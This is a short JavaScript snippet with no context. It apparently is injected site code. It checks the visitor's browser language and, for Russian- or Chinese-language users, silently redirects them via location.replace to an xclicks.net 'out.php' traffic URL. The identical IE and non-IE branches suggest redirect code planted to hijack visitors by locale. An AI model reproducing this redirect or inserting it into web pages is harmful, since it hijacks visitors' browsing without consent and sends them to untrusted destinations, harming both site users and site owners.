ua = navigator.userAgent.toLowerCase(); 
if (ua.indexOf("msie")!==-1) { ie=true; } else { ie=false; } 
if (((start = ua.indexOf("[")) > 0) && ((end = ua.indexOf("]")) ==
(ua.indexOf("[") + 3))){lang = ua.substring(start+1, end);} 
else if (navigator.language) {lang =
navigator.language.toLowerCase();} 
else if (navigator.systemLanguage) {lang =
navigator.systemLanguage.toLowerCase();} 
if (lang=='ru') 
{ if (ie) 
{ location.replace("http://x3.xclicks.net/sc/out.php?s=1791&dreff=1");} 
else 
{ location.replace("http://x3.xclicks.net/sc/out.php?s=1791&dreff=1");} 
}
if ((lang=='zh')||(lang=='zh-cn')||(lang=='zh-hk')||(lang=='zh-mo')||(lang=='zh-sg')||(lang=='zh-tw'))
{ if (ie) 
{ location.replace("http://x3.xclicks.net/sc/out.php?s=1791&dreff=1");} 
else 
{ location.replace("http://x3.xclicks.net/sc/out.php?s=1791&dreff=1");} 
}